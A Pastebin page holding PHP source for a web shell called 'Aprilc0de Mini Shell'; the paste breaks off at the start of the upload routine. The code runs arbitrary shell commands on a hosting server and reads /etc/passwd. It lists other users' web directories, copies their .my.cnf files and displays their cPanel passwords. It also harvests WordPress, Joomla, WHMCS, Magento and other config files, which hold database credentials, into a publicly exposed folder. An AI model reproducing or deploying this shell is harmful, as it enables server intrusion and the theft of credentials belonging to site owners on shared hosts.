API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 25th, 2018
119
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.00 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. ?>
  4. <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
  5. "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
  6. <title>Aprilc0de Mini Shell</title>
  7. <link href="http://fonts.googleapis.com/css?family=Squada+One" rel="stylesheet" type="text/css">
  8. <style>
  9. body {background:#fff;color:#F7C630;padding-left:5px;padding-right:5px;font-family:Squada One;}
  10. a {text-decoration:none;color:#2F706C;}
  11. .aa {border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
  12. textarea {background:#fff;font-family:Squada One;border:1px solid #2D1F3B;margin:3px;padding:2px;height:200px;width:300px;color:#036564}
  13. input[type=submit] {background:none;font-family:Squada One;color:#AE8FBA;border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
  14. .t {color:#AE8FBA}
  15. input[type=file], input[type=text], input[type=password] {background:#fff;font-family:Squada One;color:#036564;border:1px solid #2D1F3B;margin:3px;padding:2px;height:21px;width:300px;}
  16. </style>
  17.  
  18. <?php
  19. // Coded By UstadCage_48 - Aprilc0de
  20. // 100% ?? tentu tidak lah bro
  21. // Default pas [x48]
  22. // fb853cd86dc5cccd63690f6b93ccd15e
  23. $pass="";
  24. session_start();
  25. error_reporting(0);
  26. function ustad(){
  27. echo '<center>&#8226; Aprilc0de Mini Shell &#8226;<br><form action="" method="post">
  28. <input type="password" style="width:250px" name="pass" value="" /> <input type="submit" value=" >> " name="submitlogin" />
  29. </form></center>';
  30. exit;
  31. }
  32.  
  33. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  34. if(empty($pass)||(isset($_POST['pass'])&&(md5($_POST['pass'])==$pass)))$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  35. else
  36. ustad();
  37. if(isset($_GET['log'])&&($_GET['log']=='out')){ unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); }
  38.  
  39. if($_GET['path']){
  40. $path = $_GET['path'];
  41. } else {
  42. $path = getcwd();
  43. }
  44. error_reporting(0);
  45. $dir = str_replace('\\','/',$path);
  46. $paths = explode('/',$dir);
  47. $uname = php_uname();
  48. $os = PHP_OS;
  49. $ip = $_SERVER['SERVER_ADDR'];
  50. $id = getmyuid().'/'.getmygid();
  51. $soft = $_SERVER['SERVER_SOFTWARE'];
  52. $ver = phpversion();
  53. if(ini_get('safe_mode')==0){ $sm = "<font color='#EA5A6A'>OFF</font>"; } else { $sm = "ON"; }
  54. if(get_magic_quotes_gpc()=="1" or get_magic_quotes_gpc()=="on"){ $mq = "<font color='#EA5A6A'>OFF</font>"; } else { $mq = "ON"; }
  55.  
  56. function exe($cmd){
  57. if(function_exists('system')) {
  58. @ob_start();
  59. @system($cmd);
  60. $buff = @ob_get_contents();
  61. @ob_end_clean();
  62. return $buff;
  63. }
  64. elseif(function_exists('exec')) {
  65. @exec($cmd,$results);
  66. $buff = "";
  67. foreach($results as $result){
  68. $buff .= $result;
  69. }
  70. return $buff;
  71. }
  72. elseif(function_exists('passthru')) {
  73. @ob_start();
  74. @passthru($cmd);
  75. $buff = @ob_get_contents();
  76. @ob_end_clean();
  77. return $buff;
  78. }
  79. elseif(function_exists('shell_exec')){
  80. $buff = @shell_exec($cmd);
  81. return $buff;
  82. }
  83. }
  84.  
  85. if(function_exists('mysql_connect')){ $mysql = "ON"; } else { $mysql = "<font color='#EA5A6A'>OFF</font>"; }
  86. if(function_exists('curl_version')) { $curl = "ON"; } else { $curl = "<font color='#EA5A6A'>OFF</font>"; }
  87. if(exe('wget --help')) { $wget = "ON"; } else { $wget = "<font color='#EA5A6A'>OFF</font>"; }
  88. if(exe('perl -h')) { $perl = "ON"; } else { $perl = "<font color='#EA5A6A'>OFF</font>"; }
  89. if($disablefunc=@ini_get("disable_functions")){ $df = "ON"; }else { $df = "<font color='#EA5A6A'>OFF</font>"; }
  90.  
  91. echo "<br>&#8362; Aprilc0de Mini Shell<br>&#8362; <font color='#629454'>UNAME :</font> $uname <br>";
  92. echo "&#8362; <font color='#629454'>IP :</font> $ip $soft $os $ver ( $id )<br>";
  93. echo "&#8362; <font color='#629454'>SAFEMOD :</font> $sm &#8227; <font color='#629454'>MAGIC :</font> $mq &#8227; <font color='#629454'>MYSQL :</font> $mysql &#8227; <font color='#629454'>DISFUNC :</font> $df &#8227; <font color='#629454'>CURL :</font> $curl &#8227; <font color='#629454'>WGET :</font> $wget<br>";
  94.  
  95. echo "&#8362; <font color='#629454'>PATH :</font> ";
  96. foreach($paths as $id=>$pat){
  97. if($pat == '' && $id == 0){
  98. $a = true;
  99. echo '<a style="color:#F7C630;" href="?path=/"> &#8227; </a>';
  100. continue;
  101. }
  102. if($pat == '') continue;
  103. echo '<a class="t" href="?path=';
  104. for($i=0;$i<=$id;$i++){
  105. echo "$paths[$i]";
  106. if($i != $id) echo "/";
  107. }
  108. echo '">'.$pat.'</a> &#8227; ';
  109. }
  110. echo "<br><br><center><a class='aa' href='?upload&path=$path'>Upload</a> <a class='aa' href='?jumping&path=$path'>Jumper</a> <a class='aa' href='?config'>Config</a> <a class='aa' href='?cpcrack'>CpCrack</a></center><br>";
  111.  
  112. if(isset($_GET['cpcrack'])){
  113.  
  114. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  115. $ar0=explode($marqueurDebutLien, $text);
  116. $ar1=explode($marqueurFinLien, $ar0[$i]);
  117. return trim($ar1[0]);
  118. }
  119.  
  120. echo '<br><br>';
  121.  
  122. echo "<center>";
  123. $d0mains = @file('/etc/named.conf');
  124. $domains = scandir("/var/named");
  125.  
  126. if ($domains or $d0mains)
  127. {
  128. $domains = scandir("/var/named");
  129. if($domains) {
  130. echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
  131. $count=1;
  132. $dc = 0;
  133. $list = scandir("/var/named");
  134. foreach($list as $domain){
  135. if(strpos($domain,".db")){
  136. $domain = str_replace('.db','',$domain);
  137. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  138. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  139. $path = getcwd();
  140.  
  141. if (is_readable($dirz)) {
  142. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  143. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  144. $password=entre2v2($p,'password="','"');
  145. echo "<tr><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'> >> </a></td></tr>";
  146. $dc++;
  147. }
  148. }
  149. }
  150. echo '</table>';
  151. $total = $dc;
  152. echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
  153. echo '</center>';
  154. }else{
  155. $d0mains = @file('/etc/named.conf');
  156. if($d0mains) {
  157. echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
  158. $count=1;
  159. $dc = 0;
  160. $mck = array();
  161. foreach($d0mains as $d0main){
  162. if(@eregi('zone',$d0main)){
  163. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  164. flush();
  165. if(strlen(trim($domain[1][0])) >2){
  166. $mck[] = $domain[1][0];
  167. }
  168. }
  169. }
  170. $mck = array_unique($mck);
  171. $usr = array();
  172. $dmn = array();
  173. foreach($mck as $o) {
  174. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  175. $usr[] = $infos['name'];
  176. $dmn[] = $o;
  177. }
  178. array_multisort($usr,$dmn);
  179. $dt = file('/etc/passwd');
  180. $passwd = array();
  181. foreach($dt as $d) {
  182. $r = explode(':',$d);
  183. if(strpos($r[5],'home')) {
  184. $passwd[$r[0]] = $r[5];
  185. }
  186. }
  187. $l=0;
  188. $j=1;
  189. foreach($usr as $r) {
  190. $dirz = '/home/'.$r.'/.my.cnf';
  191. $path = getcwd();
  192. if (is_readable($dirz)) {
  193. copy($dirz, ''.$path.'/'.$r.'.txt');
  194. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  195. $password=entre2v2($p,'password="','"');
  196. echo "<tr><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'> >> </a></td></tr>";
  197. $dc++;
  198. flush();
  199. $l=$l?0:1;
  200. $j++;
  201. }
  202. }
  203. }
  204. echo '</table>';
  205. $total = $dc;
  206. echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
  207. echo '</center>';
  208.  
  209. }
  210. }else{
  211. echo "</center><font color='#629454'>ERROR : </font>/var/named or etc/named.conf Not Accessible!";
  212. }
  213. exit;
  214.  
  215. }
  216.  
  217. if(isset($_GET['view'])){
  218. echo "<center><textarea>".htmlentities(file_get_contents($_GET['path'].'/'.$_GET['filename']))."</textarea></center>";
  219. exit;
  220. }
  221. if(isset($_GET['jumping'])){
  222. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><font color="#AE8FBA">Error: safe_mode = on</font>');
  223. set_time_limit(0);
  224. @$passwd = fopen('/etc/passwd','r');
  225. if (!$passwd) { die('<br><font color="#AE8FBA">Error : coudn`t read /etc/passwd</font>'); }
  226. $pub = array();
  227. $users = array();
  228. $conf = array();
  229. $i = 0;
  230. while(!feof($passwd))
  231. {
  232. $str = fgets($passwd);
  233. if($i>35){
  234. $pos = strpos($str,':');
  235. $username = substr($str,0,$pos);
  236. $dirz = '/home/'.$username.'/public_html/';
  237. if(($username != '')){
  238. if(is_readable($dirz)){
  239. array_push($users,$username);
  240. array_push($pub,$dirz);
  241. }}}
  242. $i++;
  243. }
  244. echo "<br>&#8227; <font color='#629454'>Total :</font> ".sizeof($users)."/".sizeof($pub)." User";
  245. echo "<br><br>";
  246. foreach($users as $user){
  247. $path = "/home/$user/public_html/";
  248. echo " <table style='text-align:left'><tr><td style='text-align:left'> ";
  249. echo "&#8226; <a href='?path=$path'>$path</a><br>";
  250. echo " </td></tr></table> ";
  251. }
  252. exit;
  253. }
  254. // config by Indoxploit
  255. if(isset($_GET['config']))
  256. {
  257. $etc = fopen("/etc/passwd", "r");
  258. $idx = mkdir("aprilc0de", 0777);
  259. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  260. $htc = fopen("aprilc0de/.htaccess","w");
  261. fwrite($htc, $isi_htc);
  262. while($passwd = fgets($etc)) {
  263. if($passwd == "" || !$etc) {
  264. echo "<font color=#AE8FBA>Can't read /etc/passwd</font>";
  265. } else {
  266. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  267. foreach($user_config[1] as $user_idx){
  268. $user_config_dir = "/home/$user_idx/public_html/";
  269. if(is_readable($user_config_dir)) {
  270. $grab_config = array(
  271. "/home/$user_idx/.my.cnf" => "cpanel",
  272. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  273. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  274. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  275. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  276. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  277. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  278. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  279. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  280. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  281. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  282. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  283. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  284. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  285. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  286. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  287. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  288. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  289. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  290. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  291. foreach($grab_config as $config => $nama_config){
  292. $ambil_config = file_get_contents($config);
  293. if($ambil_config == ''){
  294. } else {
  295. $file_config = fopen("aprilc0de/$user_idx-$nama_config.txt","w");
  296. fputs($file_config,$ambil_config);
  297. }}} }}}
  298. $path = getcwd();
  299. echo "&#8227;<font color='629454'> Done :</font> <a href='?beby=exploler&path=$path$dir/aprilc0de'>Click Here</a>";
  300. exit;
  301. }
  302. // uploader
  303. if(isset($_GET['upload'])){
  304. $path = $_GET['path'];
  305. echo '<center><form action="" method="post" enctype="multipart/form-data">
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!